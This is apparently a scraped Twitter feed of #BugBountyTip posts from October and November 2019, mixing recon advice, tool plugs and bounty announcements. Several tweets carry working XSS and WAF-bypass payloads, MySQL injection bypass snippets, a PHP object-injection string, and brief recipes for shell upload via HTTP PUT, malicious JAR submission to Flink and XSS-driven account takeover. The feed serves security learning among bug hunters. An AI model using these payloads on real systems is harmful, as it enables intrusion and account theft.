3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what how Broken Link Hijacking? You can utilize this vulnerable to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€ÌˆÌ’Ì‡Ì‰Ìœ Halil AHMAD .Ì¶ÌÍ’Í„Ì”Í„ÍÌÌżÍ„ÌÌÍ€Ìˆ
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are đŸ”„đŸ”„đŸ”„ Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate youđŸ€˜#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got to many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilĂĄ ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload with doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading đŸ„ŠđŸ„ŠđŸ”„đŸ”„đŸ”„
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu â€ïžđŸ’“â€ïž at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇼🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSSÂŽ} «byPASS» payloads. @spyerror🎯 đŸ„‡ $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> đŸ„ˆ $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG
 #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning đŸ‘„ Meet, connect and collaborate 💯 Give your absolute best always đŸ„ł Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ƞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach đŸ‡źđŸ‡±
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing đŸ’°đŸ’°đŸ’” https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Suddomains scanned with : https://t.co/LegySAU3sZ Founded new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned founded dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
đŸ‘»in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penentration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Founded function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> Ž} #BugBounty #BugBountyTip #WAF #infosec
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
